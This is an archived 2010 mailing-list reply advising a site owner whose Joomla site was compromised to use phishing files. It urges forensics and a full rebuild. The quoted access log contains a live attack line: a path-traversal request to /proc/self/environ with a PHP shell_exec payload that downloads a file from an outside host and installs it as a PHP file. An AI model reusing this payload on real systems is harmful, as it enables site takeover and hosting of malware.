[thelist] block phishing
John List
johnlist at gulfbridge.net
Sun Mar 28 14:18:20 CDT 2010
On 03/28/2010 12:20 PM, Bob Meetin wrote:
> I got a notice that one of my sites got hit yesterday, so I logged in,
> and identified the file mentioned, also found a couple php files that
> got dropped into webhome that were related. I moved the files into an
> out of webroot folder for future scrutinization, then checked the
> server access log, found a number of entries at the approximate date
> stamp of the uploaded files that seemed to be related.
>
> I am methodically going through the system looking for anything not
> locked down. What I could use some help with is understanding if the
> access log entries are associated and how to lock out the intruders.
> As IP addresses change I suspect it's more than simply editing the
> robots.txt or adding a line in the .htaccess.
Bob,
I'm a long time subscriber to this list but don't read all the posts so
pardon me if I'm missing some context here. My impression is this:
*
You say you "got a notice" that one of your sites has been "hit"
and you have identified the "file mentioned". From that and your
post's subject I infer that you mean that someone notified you
that your site is hosting a phishing exploit.
*
Your reaction so far is to look at the web log and consider
tweaking your web configuration.
My reaction is that you are taking this far too lightly. The fact that
someone else has, without your knowledge, placed files on your system
indicates that your system had a vulnerability and is now compromised.
You should therefore take your system off line and rebuild it from
scratch using backups.
To prevent such an exploit on your rebuilt system, you should do some
forensics on the current system's disk before wiping it to determine how
someone gained access. (Hint: The compromise occurred before the post of
/fat.php but it has nothing to do with baidu.com or its spider.)
I am not familiar with Joomla's vulnerabilities, but if you suspect the
intruder came via the web, then I'd recommend you do an inquiry on a
Joomla list. Otherwise, you shouldn't rule out an intrusion thru ftp or
ssh. So you need to check all your logs, not just your web log. (But a
sophisticated attack will cover its tracks by altering the logs so you
may never know.)
But even if you determine how they did this, you don't know how much
damage they did. That's why it's important to rebuild your system.
Good luck,
John
> Some of the suspicious entries look like:
>
> 123.125.66.72 - - [27/Mar/2010:18:58:09 -0500] "GET / HTTP/1.1" 200
> 18076 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
>
> 83.229.80.30 - - [27/Mar/2010:18:58:41 -0500] "POST /fat.php HTTP/1.1"
> 200 8015 "http://www.$websitename/fat.php" "Mozilla/5.0 (Windows; U;
> Windows NT 6.0; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET
> CLR 3.5.30729)"
>
> fat.php was one of the deposited files. 18:58 was the datestamp.
>
> 75.125.130.100 - - [27/Mar/2010:22:25:47 -0500] "GET
> /administrator/host.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"
>
> Related? There is nothing (current) in the filesystem called host.php
>
> 80.246.53.20 - - [27/Mar/2010:22:25:41 -0500] "GET
> /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00%0F
> HTTP/1.1" 200 1423 "-" "<? shell_exec('lwp-download
> http://immortal-killaz.servercamp.de/fanatix/tv.txt;mv tv.txt
> print_out.php');?>"
>
> com_sectionex is a Joomla component. There is also no legitimate file
> called print_out.php but which I found.
>
> 75.125.130.100 - - [27/Mar/2010:22:25:48 -0500] "GET
> /administrator/hr57.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"
>
> Suggestions for robots.txt:
>
> |#Baiduspider
> User-agent: Baiduspider
> Disallow: /
>
> #Others
> User-agent: *
> Disallow: /
>
> Suggestions for .htaccess:
>
> ||<Files *.*>
> order allow,deny
> allow from all
> deny from 220.181.
> </Files>
>
> -Bob
> |
More information about the thelist
mailing list